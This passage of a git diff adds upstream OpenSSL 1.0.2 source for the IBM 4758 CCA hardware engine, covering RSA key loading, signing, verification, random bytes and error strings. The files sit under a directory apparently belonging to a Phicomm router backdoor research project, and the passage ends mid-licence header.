+#  ifndef OPENSSL_NO_RSA
+    if (!(keyRecordRead = (F_KEYRECORDREAD)
+          DSO_bind_func(dso, n_keyRecordRead)) ||
+        !(randomNumberGenerate = (F_RANDOMNUMBERGENERATE)
+          DSO_bind_func(dso, n_randomNumberGenerate)) ||
+        !(digitalSignatureGenerate = (F_DIGITALSIGNATUREGENERATE)
+          DSO_bind_func(dso, n_digitalSignatureGenerate)) ||
+        !(digitalSignatureVerify = (F_DIGITALSIGNATUREVERIFY)
+          DSO_bind_func(dso, n_digitalSignatureVerify)) ||
+        !(publicKeyExtract = (F_PUBLICKEYEXTRACT)
+          DSO_bind_func(dso, n_publicKeyExtract)) ||
+        !(pkaEncrypt = (F_PKAENCRYPT)
+          DSO_bind_func(dso, n_pkaEncrypt)) || !(pkaDecrypt = (F_PKADECRYPT)
+                                                 DSO_bind_func(dso,
+                                                               n_pkaDecrypt)))
+    {
+        CCA4758err(CCA4758_F_IBM_4758_CCA_INIT, CCA4758_R_DSO_FAILURE);
+        goto err;
+    }
+#  else
+    if (!(randomNumberGenerate = (F_RANDOMNUMBERGENERATE)
+          DSO_bind_func(dso, n_randomNumberGenerate))) {
+        CCA4758err(CCA4758_F_IBM_4758_CCA_INIT, CCA4758_R_DSO_FAILURE);
+        goto err;
+    }
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+    hndidx = RSA_get_ex_new_index(0, "IBM 4758 CCA RSA key handle",
+                                  NULL, NULL, cca_ex_free);
+#  endif
+
+    return 1;
+ err:
+    if (dso)
+        DSO_free(dso);
+    dso = NULL;
+
+#  ifndef OPENSSL_NO_RSA
+    keyRecordRead = (F_KEYRECORDREAD) 0;
+    digitalSignatureGenerate = (F_DIGITALSIGNATUREGENERATE) 0;
+    digitalSignatureVerify = (F_DIGITALSIGNATUREVERIFY)0;
+    publicKeyExtract = (F_PUBLICKEYEXTRACT)0;
+    pkaEncrypt = (F_PKAENCRYPT) 0;
+    pkaDecrypt = (F_PKADECRYPT) 0;
+#  endif
+    randomNumberGenerate = (F_RANDOMNUMBERGENERATE) 0;
+    return 0;
+}
+
+static int ibm_4758_cca_finish(ENGINE *e)
+{
+    free_CCA4758_LIB_NAME();
+    if (!dso) {
+        CCA4758err(CCA4758_F_IBM_4758_CCA_FINISH, CCA4758_R_NOT_LOADED);
+        return 0;
+    }
+    if (!DSO_free(dso)) {
+        CCA4758err(CCA4758_F_IBM_4758_CCA_FINISH, CCA4758_R_UNIT_FAILURE);
+        return 0;
+    }
+    dso = NULL;
+#  ifndef OPENSSL_NO_RSA
+    keyRecordRead = (F_KEYRECORDREAD) 0;
+    randomNumberGenerate = (F_RANDOMNUMBERGENERATE) 0;
+    digitalSignatureGenerate = (F_DIGITALSIGNATUREGENERATE) 0;
+    digitalSignatureVerify = (F_DIGITALSIGNATUREVERIFY)0;
+    publicKeyExtract = (F_PUBLICKEYEXTRACT)0;
+    pkaEncrypt = (F_PKAENCRYPT) 0;
+    pkaDecrypt = (F_PKADECRYPT) 0;
+#  endif
+    randomNumberGenerate = (F_RANDOMNUMBERGENERATE) 0;
+    return 1;
+}
+
+static int ibm_4758_cca_ctrl(ENGINE *e, int cmd, long i, void *p,
+                             void (*f) (void))
+{
+    int initialised = ((dso == NULL) ? 0 : 1);
+    switch (cmd) {
+    case CCA4758_CMD_SO_PATH:
+        if (p == NULL) {
+            CCA4758err(CCA4758_F_IBM_4758_CCA_CTRL,
+                       ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        if (initialised) {
+            CCA4758err(CCA4758_F_IBM_4758_CCA_CTRL, CCA4758_R_ALREADY_LOADED);
+            return 0;
+        }
+        return set_CCA4758_LIB_NAME((const char *)p);
+    default:
+        break;
+    }
+    CCA4758err(CCA4758_F_IBM_4758_CCA_CTRL,
+               CCA4758_R_COMMAND_NOT_IMPLEMENTED);
+    return 0;
+}
+
+#  ifndef OPENSSL_NO_RSA
+
+#   define MAX_CCA_PKA_TOKEN_SIZE 2500
+
+static EVP_PKEY *ibm_4758_load_privkey(ENGINE *e, const char *key_id,
+                                       UI_METHOD *ui_method,
+                                       void *callback_data)
+{
+    RSA *rtmp = NULL;
+    EVP_PKEY *res = NULL;
+    unsigned char *keyToken = NULL;
+    unsigned char pubKeyToken[MAX_CCA_PKA_TOKEN_SIZE];
+    long pubKeyTokenLength = MAX_CCA_PKA_TOKEN_SIZE;
+    long keyTokenLength = MAX_CCA_PKA_TOKEN_SIZE;
+    long returnCode;
+    long reasonCode;
+    long exitDataLength = 0;
+    long ruleArrayLength = 0;
+    unsigned char exitData[8];
+    unsigned char ruleArray[8];
+    unsigned char keyLabel[64];
+    unsigned long keyLabelLength = strlen(key_id);
+    unsigned char modulus[256];
+    long modulusFieldLength = sizeof(modulus);
+    long modulusLength = 0;
+    unsigned char exponent[256];
+    long exponentLength = sizeof(exponent);
+
+    if (keyLabelLength > sizeof(keyLabel)) {
+        CCA4758err(CCA4758_F_IBM_4758_LOAD_PRIVKEY,
+                   CCA4758_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+        return NULL;
+    }
+
+    memset(keyLabel, ' ', sizeof(keyLabel));
+    memcpy(keyLabel, key_id, keyLabelLength);
+
+    keyToken = OPENSSL_malloc(MAX_CCA_PKA_TOKEN_SIZE + sizeof(long));
+    if (!keyToken) {
+        CCA4758err(CCA4758_F_IBM_4758_LOAD_PRIVKEY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    keyRecordRead(&returnCode, &reasonCode, &exitDataLength,
+                  exitData, &ruleArrayLength, ruleArray, keyLabel,
+                  &keyTokenLength, keyToken + sizeof(long));
+
+    if (returnCode) {
+        CCA4758err(CCA4758_F_IBM_4758_LOAD_PRIVKEY,
+                   CCA4758_R_FAILED_LOADING_PRIVATE_KEY);
+        goto err;
+    }
+
+    publicKeyExtract(&returnCode, &reasonCode, &exitDataLength,
+                     exitData, &ruleArrayLength, ruleArray, &keyTokenLength,
+                     keyToken + sizeof(long), &pubKeyTokenLength,
+                     pubKeyToken);
+
+    if (returnCode) {
+        CCA4758err(CCA4758_F_IBM_4758_LOAD_PRIVKEY,
+                   CCA4758_R_FAILED_LOADING_PRIVATE_KEY);
+        goto err;
+    }
+
+    if (!getModulusAndExponent(pubKeyToken, &exponentLength,
+                               exponent, &modulusLength, &modulusFieldLength,
+                               modulus)) {
+        CCA4758err(CCA4758_F_IBM_4758_LOAD_PRIVKEY,
+                   CCA4758_R_FAILED_LOADING_PRIVATE_KEY);
+        goto err;
+    }
+
+    (*(long *)keyToken) = keyTokenLength;
+    rtmp = RSA_new_method(e);
+    RSA_set_ex_data(rtmp, hndidx, (char *)keyToken);
+
+    rtmp->e = BN_bin2bn(exponent, exponentLength, NULL);
+    rtmp->n = BN_bin2bn(modulus, modulusFieldLength, NULL);
+    rtmp->flags |= RSA_FLAG_EXT_PKEY;
+
+    res = EVP_PKEY_new();
+    EVP_PKEY_assign_RSA(res, rtmp);
+
+    return res;
+ err:
+    if (keyToken)
+        OPENSSL_free(keyToken);
+    return NULL;
+}
+
+static EVP_PKEY *ibm_4758_load_pubkey(ENGINE *e, const char *key_id,
+                                      UI_METHOD *ui_method,
+                                      void *callback_data)
+{
+    RSA *rtmp = NULL;
+    EVP_PKEY *res = NULL;
+    unsigned char *keyToken = NULL;
+    long keyTokenLength = MAX_CCA_PKA_TOKEN_SIZE;
+    long returnCode;
+    long reasonCode;
+    long exitDataLength = 0;
+    long ruleArrayLength = 0;
+    unsigned char exitData[8];
+    unsigned char ruleArray[8];
+    unsigned char keyLabel[64];
+    unsigned long keyLabelLength = strlen(key_id);
+    unsigned char modulus[512];
+    long modulusFieldLength = sizeof(modulus);
+    long modulusLength = 0;
+    unsigned char exponent[512];
+    long exponentLength = sizeof(exponent);
+
+    if (keyLabelLength > sizeof(keyLabel)) {
+        CCA4758err(CCA4758_F_IBM_4758_LOAD_PUBKEY,
+                   CCA4758_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+        return NULL;
+    }
+
+    memset(keyLabel, ' ', sizeof(keyLabel));
+    memcpy(keyLabel, key_id, keyLabelLength);
+
+    keyToken = OPENSSL_malloc(MAX_CCA_PKA_TOKEN_SIZE + sizeof(long));
+    if (!keyToken) {
+        CCA4758err(CCA4758_F_IBM_4758_LOAD_PUBKEY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    keyRecordRead(&returnCode, &reasonCode, &exitDataLength, exitData,
+                  &ruleArrayLength, ruleArray, keyLabel, &keyTokenLength,
+                  keyToken + sizeof(long));
+
+    if (returnCode) {
+        CCA4758err(CCA4758_F_IBM_4758_LOAD_PUBKEY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!getModulusAndExponent(keyToken + sizeof(long), &exponentLength,
+                               exponent, &modulusLength, &modulusFieldLength,
+                               modulus)) {
+        CCA4758err(CCA4758_F_IBM_4758_LOAD_PUBKEY,
+                   CCA4758_R_FAILED_LOADING_PUBLIC_KEY);
+        goto err;
+    }
+
+    (*(long *)keyToken) = keyTokenLength;
+    rtmp = RSA_new_method(e);
+    RSA_set_ex_data(rtmp, hndidx, (char *)keyToken);
+    rtmp->e = BN_bin2bn(exponent, exponentLength, NULL);
+    rtmp->n = BN_bin2bn(modulus, modulusFieldLength, NULL);
+    rtmp->flags |= RSA_FLAG_EXT_PKEY;
+    res = EVP_PKEY_new();
+    EVP_PKEY_assign_RSA(res, rtmp);
+
+    return res;
+ err:
+    if (keyToken)
+        OPENSSL_free(keyToken);
+    return NULL;
+}
+
+static int cca_rsa_pub_enc(int flen, const unsigned char *from,
+                           unsigned char *to, RSA *rsa, int padding)
+{
+    long returnCode;
+    long reasonCode;
+    long lflen = flen;
+    long exitDataLength = 0;
+    unsigned char exitData[8];
+    long ruleArrayLength = 1;
+    unsigned char ruleArray[8] = "PKCS-1.2";
+    long dataStructureLength = 0;
+    unsigned char dataStructure[8];
+    long outputLength = RSA_size(rsa);
+    long keyTokenLength;
+    unsigned char *keyToken = (unsigned char *)RSA_get_ex_data(rsa, hndidx);
+
+    keyTokenLength = *(long *)keyToken;
+    keyToken += sizeof(long);
+
+    pkaEncrypt(&returnCode, &reasonCode, &exitDataLength, exitData,
+               &ruleArrayLength, ruleArray, &lflen, (unsigned char *)from,
+               &dataStructureLength, dataStructure, &keyTokenLength,
+               keyToken, &outputLength, to);
+
+    if (returnCode || reasonCode)
+        return -(returnCode << 16 | reasonCode);
+    return outputLength;
+}
+
+static int cca_rsa_priv_dec(int flen, const unsigned char *from,
+                            unsigned char *to, RSA *rsa, int padding)
+{
+    long returnCode;
+    long reasonCode;
+    long lflen = flen;
+    long exitDataLength = 0;
+    unsigned char exitData[8];
+    long ruleArrayLength = 1;
+    unsigned char ruleArray[8] = "PKCS-1.2";
+    long dataStructureLength = 0;
+    unsigned char dataStructure[8];
+    long outputLength = RSA_size(rsa);
+    long keyTokenLength;
+    unsigned char *keyToken = (unsigned char *)RSA_get_ex_data(rsa, hndidx);
+
+    keyTokenLength = *(long *)keyToken;
+    keyToken += sizeof(long);
+
+    pkaDecrypt(&returnCode, &reasonCode, &exitDataLength, exitData,
+               &ruleArrayLength, ruleArray, &lflen, (unsigned char *)from,
+               &dataStructureLength, dataStructure, &keyTokenLength,
+               keyToken, &outputLength, to);
+
+    return (returnCode | reasonCode) ? 0 : 1;
+}
+
+#   define SSL_SIG_LEN 36
+
+static int cca_rsa_verify(int type, const unsigned char *m,
+                          unsigned int m_len, const unsigned char *sigbuf,
+                          unsigned int siglen, const RSA *rsa)
+{
+    long returnCode;
+    long reasonCode;
+    long lsiglen = siglen;
+    long exitDataLength = 0;
+    unsigned char exitData[8];
+    long ruleArrayLength = 1;
+    unsigned char ruleArray[8] = "PKCS-1.1";
+    long keyTokenLength;
+    unsigned char *keyToken = (unsigned char *)RSA_get_ex_data(rsa, hndidx);
+    long length = SSL_SIG_LEN;
+    long keyLength;
+    unsigned char *hashBuffer = NULL;
+    X509_SIG sig;
+    ASN1_TYPE parameter;
+    X509_ALGOR algorithm;
+    ASN1_OCTET_STRING digest;
+
+    keyTokenLength = *(long *)keyToken;
+    keyToken += sizeof(long);
+
+    if (type == NID_md5 || type == NID_sha1) {
+        sig.algor = &algorithm;
+        algorithm.algorithm = OBJ_nid2obj(type);
+
+        if (!algorithm.algorithm) {
+            CCA4758err(CCA4758_F_CCA_RSA_VERIFY,
+                       CCA4758_R_UNKNOWN_ALGORITHM_TYPE);
+            return 0;
+        }
+
+        if (!algorithm.algorithm->length) {
+            CCA4758err(CCA4758_F_CCA_RSA_VERIFY,
+                       CCA4758_R_ASN1_OID_UNKNOWN_FOR_MD);
+            return 0;
+        }
+
+        parameter.type = V_ASN1_NULL;
+        parameter.value.ptr = NULL;
+        algorithm.parameter = &parameter;
+
+        sig.digest = &digest;
+        sig.digest->data = (unsigned char *)m;
+        sig.digest->length = m_len;
+
+        length = i2d_X509_SIG(&sig, NULL);
+    }
+
+    keyLength = RSA_size(rsa);
+
+    if (length - RSA_PKCS1_PADDING > keyLength) {
+        CCA4758err(CCA4758_F_CCA_RSA_VERIFY,
+                   CCA4758_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+        return 0;
+    }
+
+    switch (type) {
+    case NID_md5_sha1:
+        if (m_len != SSL_SIG_LEN) {
+            CCA4758err(CCA4758_F_CCA_RSA_VERIFY,
+                       CCA4758_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+            return 0;
+        }
+
+        hashBuffer = (unsigned char *)m;
+        length = m_len;
+        break;
+    case NID_md5:
+        {
+            unsigned char *ptr;
+            ptr = hashBuffer = OPENSSL_malloc((unsigned int)keyLength + 1);
+            if (!hashBuffer) {
+                CCA4758err(CCA4758_F_CCA_RSA_VERIFY, ERR_R_MALLOC_FAILURE);
+                return 0;
+            }
+
+            i2d_X509_SIG(&sig, &ptr);
+        }
+        break;
+    case NID_sha1:
+        {
+            unsigned char *ptr;
+            ptr = hashBuffer = OPENSSL_malloc((unsigned int)keyLength + 1);
+            if (!hashBuffer) {
+                CCA4758err(CCA4758_F_CCA_RSA_VERIFY, ERR_R_MALLOC_FAILURE);
+                return 0;
+            }
+            i2d_X509_SIG(&sig, &ptr);
+        }
+        break;
+    default:
+        return 0;
+    }
+
+    digitalSignatureVerify(&returnCode, &reasonCode, &exitDataLength,
+                           exitData, &ruleArrayLength, ruleArray,
+                           &keyTokenLength, keyToken, &length, hashBuffer,
+                           &lsiglen, (unsigned char *)sigbuf);
+
+    if (type == NID_sha1 || type == NID_md5) {
+        OPENSSL_cleanse(hashBuffer, keyLength + 1);
+        OPENSSL_free(hashBuffer);
+    }
+
+    return ((returnCode || reasonCode) ? 0 : 1);
+}
+
+#   define SSL_SIG_LEN 36
+
+static int cca_rsa_sign(int type, const unsigned char *m, unsigned int m_len,
+                        unsigned char *sigret, unsigned int *siglen,
+                        const RSA *rsa)
+{
+    long returnCode;
+    long reasonCode;
+    long exitDataLength = 0;
+    unsigned char exitData[8];
+    long ruleArrayLength = 1;
+    unsigned char ruleArray[8] = "PKCS-1.1";
+    long outputLength = 256;
+    long outputBitLength;
+    long keyTokenLength;
+    unsigned char *hashBuffer = NULL;
+    unsigned char *keyToken = (unsigned char *)RSA_get_ex_data(rsa, hndidx);
+    long length = SSL_SIG_LEN;
+    long keyLength;
+    X509_SIG sig;
+    ASN1_TYPE parameter;
+    X509_ALGOR algorithm;
+    ASN1_OCTET_STRING digest;
+
+    keyTokenLength = *(long *)keyToken;
+    keyToken += sizeof(long);
+
+    if (type == NID_md5 || type == NID_sha1) {
+        sig.algor = &algorithm;
+        algorithm.algorithm = OBJ_nid2obj(type);
+
+        if (!algorithm.algorithm) {
+            CCA4758err(CCA4758_F_CCA_RSA_SIGN,
+                       CCA4758_R_UNKNOWN_ALGORITHM_TYPE);
+            return 0;
+        }
+
+        if (!algorithm.algorithm->length) {
+            CCA4758err(CCA4758_F_CCA_RSA_SIGN,
+                       CCA4758_R_ASN1_OID_UNKNOWN_FOR_MD);
+            return 0;
+        }
+
+        parameter.type = V_ASN1_NULL;
+        parameter.value.ptr = NULL;
+        algorithm.parameter = &parameter;
+
+        sig.digest = &digest;
+        sig.digest->data = (unsigned char *)m;
+        sig.digest->length = m_len;
+
+        length = i2d_X509_SIG(&sig, NULL);
+    }
+
+    keyLength = RSA_size(rsa);
+
+    if (length - RSA_PKCS1_PADDING > keyLength) {
+        CCA4758err(CCA4758_F_CCA_RSA_SIGN,
+                   CCA4758_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+        return 0;
+    }
+
+    switch (type) {
+    case NID_md5_sha1:
+        if (m_len != SSL_SIG_LEN) {
+            CCA4758err(CCA4758_F_CCA_RSA_SIGN,
+                       CCA4758_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+            return 0;
+        }
+        hashBuffer = (unsigned char *)m;
+        length = m_len;
+        break;
+    case NID_md5:
+        {
+            unsigned char *ptr;
+            ptr = hashBuffer = OPENSSL_malloc((unsigned int)keyLength + 1);
+            if (!hashBuffer) {
+                CCA4758err(CCA4758_F_CCA_RSA_SIGN, ERR_R_MALLOC_FAILURE);
+                return 0;
+            }
+            i2d_X509_SIG(&sig, &ptr);
+        }
+        break;
+    case NID_sha1:
+        {
+            unsigned char *ptr;
+            ptr = hashBuffer = OPENSSL_malloc((unsigned int)keyLength + 1);
+            if (!hashBuffer) {
+                CCA4758err(CCA4758_F_CCA_RSA_SIGN, ERR_R_MALLOC_FAILURE);
+                return 0;
+            }
+            i2d_X509_SIG(&sig, &ptr);
+        }
+        break;
+    default:
+        return 0;
+    }
+
+    digitalSignatureGenerate(&returnCode, &reasonCode, &exitDataLength,
+                             exitData, &ruleArrayLength, ruleArray,
+                             &keyTokenLength, keyToken, &length, hashBuffer,
+                             &outputLength, &outputBitLength, sigret);
+
+    if (type == NID_sha1 || type == NID_md5) {
+        OPENSSL_cleanse(hashBuffer, keyLength + 1);
+        OPENSSL_free(hashBuffer);
+    }
+
+    *siglen = outputLength;
+
+    return ((returnCode || reasonCode) ? 0 : 1);
+}
+
+static int getModulusAndExponent(const unsigned char *token,
+                                 long *exponentLength,
+                                 unsigned char *exponent, long *modulusLength,
+                                 long *modulusFieldLength,
+                                 unsigned char *modulus)
+{
+    unsigned long len;
+
+    if (*token++ != (char)0x1E) /* internal PKA token? */
+        return 0;
+
+    if (*token++)               /* token version must be zero */
+        return 0;
+
+    len = *token++;
+    len = len << 8;
+    len |= (unsigned char)*token++;
+
+    token += 4;                 /* skip reserved bytes */
+
+    if (*token++ == (char)0x04) {
+        if (*token++)           /* token version must be zero */
+            return 0;
+
+        len = *token++;
+        len = len << 8;
+        len |= (unsigned char)*token++;
+
+        token += 2;             /* skip reserved section */
+
+        len = *token++;
+        len = len << 8;
+        len |= (unsigned char)*token++;
+
+        *exponentLength = len;
+
+        len = *token++;
+        len = len << 8;
+        len |= (unsigned char)*token++;
+
+        *modulusLength = len;
+
+        len = *token++;
+        len = len << 8;
+        len |= (unsigned char)*token++;
+
+        *modulusFieldLength = len;
+
+        memcpy(exponent, token, *exponentLength);
+        token += *exponentLength;
+
+        memcpy(modulus, token, *modulusFieldLength);
+        return 1;
+    }
+    return 0;
+}
+
+#  endif                        /* OPENSSL_NO_RSA */
+
+static int cca_random_status(void)
+{
+    return 1;
+}
+
+static int cca_get_random_bytes(unsigned char *buf, int num)
+{
+    long ret_code;
+    long reason_code;
+    long exit_data_length;
+    unsigned char exit_data[4];
+    unsigned char form[] = "RANDOM  ";
+    unsigned char rand_buf[8];
+
+    while (num >= (int)sizeof(rand_buf)) {
+        randomNumberGenerate(&ret_code, &reason_code, &exit_data_length,
+                             exit_data, form, rand_buf);
+        if (ret_code)
+            return 0;
+        num -= sizeof(rand_buf);
+        memcpy(buf, rand_buf, sizeof(rand_buf));
+        buf += sizeof(rand_buf);
+    }
+
+    if (num) {
+        randomNumberGenerate(&ret_code, &reason_code, NULL, NULL,
+                             form, rand_buf);
+        if (ret_code)
+            return 0;
+        memcpy(buf, rand_buf, num);
+    }
+
+    return 1;
+}
+
+#  ifndef OPENSSL_NO_RSA
+static void cca_ex_free(void *obj, void *item, CRYPTO_EX_DATA *ad, int idx,
+                        long argl, void *argp)
+{
+    if (item)
+        OPENSSL_free(item);
+}
+#  endif
+
+/* Goo to handle building as a dynamic engine */
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+static int bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_4758_cca_id) != 0) &&
+        (strcmp(id, engine_4758_cca_id_alt) != 0))
+        return 0;
+    if (!bind_helper(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  endif                        /* OPENSSL_NO_DYNAMIC_ENGINE */
+# endif                         /* !OPENSSL_NO_HW_4758_CCA */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca.ec
new file mode 100644
index 0000000..f30ed02
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca.ec
@@ -0,0 +1 @@
+L CCA4758	e_4758cca_err.h		e_4758cca_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca_err.c
new file mode 100644
index 0000000..aed7199
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca_err.c
@@ -0,0 +1,153 @@
+/* e_4758cca_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_4758cca_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA CCA4758_str_functs[] = {
+    {ERR_FUNC(CCA4758_F_CCA_RSA_SIGN), "CCA_RSA_SIGN"},
+    {ERR_FUNC(CCA4758_F_CCA_RSA_VERIFY), "CCA_RSA_VERIFY"},
+    {ERR_FUNC(CCA4758_F_IBM_4758_CCA_CTRL), "IBM_4758_CCA_CTRL"},
+    {ERR_FUNC(CCA4758_F_IBM_4758_CCA_FINISH), "IBM_4758_CCA_FINISH"},
+    {ERR_FUNC(CCA4758_F_IBM_4758_CCA_INIT), "IBM_4758_CCA_INIT"},
+    {ERR_FUNC(CCA4758_F_IBM_4758_LOAD_PRIVKEY), "IBM_4758_LOAD_PRIVKEY"},
+    {ERR_FUNC(CCA4758_F_IBM_4758_LOAD_PUBKEY), "IBM_4758_LOAD_PUBKEY"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA CCA4758_str_reasons[] = {
+    {ERR_REASON(CCA4758_R_ALREADY_LOADED), "already loaded"},
+    {ERR_REASON(CCA4758_R_ASN1_OID_UNKNOWN_FOR_MD),
+     "asn1 oid unknown for md"},
+    {ERR_REASON(CCA4758_R_COMMAND_NOT_IMPLEMENTED),
+     "command not implemented"},
+    {ERR_REASON(CCA4758_R_DSO_FAILURE), "dso failure"},
+    {ERR_REASON(CCA4758_R_FAILED_LOADING_PRIVATE_KEY),
+     "failed loading private key"},
+    {ERR_REASON(CCA4758_R_FAILED_LOADING_PUBLIC_KEY),
+     "failed loading public key"},
+    {ERR_REASON(CCA4758_R_NOT_LOADED), "not loaded"},
+    {ERR_REASON(CCA4758_R_SIZE_TOO_LARGE_OR_TOO_SMALL),
+     "size too large or too small"},
+    {ERR_REASON(CCA4758_R_UNIT_FAILURE), "unit failure"},
+    {ERR_REASON(CCA4758_R_UNKNOWN_ALGORITHM_TYPE), "unknown algorithm type"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef CCA4758_LIB_NAME
+static ERR_STRING_DATA CCA4758_lib_name[] = {
+    {0, CCA4758_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int CCA4758_lib_error_code = 0;
+static int CCA4758_error_init = 1;
+
+static void ERR_load_CCA4758_strings(void)
+{
+    if (CCA4758_lib_error_code == 0)
+        CCA4758_lib_error_code = ERR_get_next_error_library();
+
+    if (CCA4758_error_init) {
+        CCA4758_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(CCA4758_lib_error_code, CCA4758_str_functs);
+        ERR_load_strings(CCA4758_lib_error_code, CCA4758_str_reasons);
+#endif
+
+#ifdef CCA4758_LIB_NAME
+        CCA4758_lib_name->error = ERR_PACK(CCA4758_lib_error_code, 0, 0);
+        ERR_load_strings(0, CCA4758_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_CCA4758_strings(void)
+{
+    if (CCA4758_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(CCA4758_lib_error_code, CCA4758_str_functs);
+        ERR_unload_strings(CCA4758_lib_error_code, CCA4758_str_reasons);
+#endif
+
+#ifdef CCA4758_LIB_NAME
+        ERR_unload_strings(0, CCA4758_lib_name);
+#endif
+        CCA4758_error_init = 1;
+    }
+}
+
+static void ERR_CCA4758_error(int function, int reason, char *file, int line)
+{
+    if (CCA4758_lib_error_code == 0)
+        CCA4758_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(CCA4758_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca_err.h
new file mode 100644
index 0000000..2f29d96
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca_err.h
@@ -0,0 +1,98 @@
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
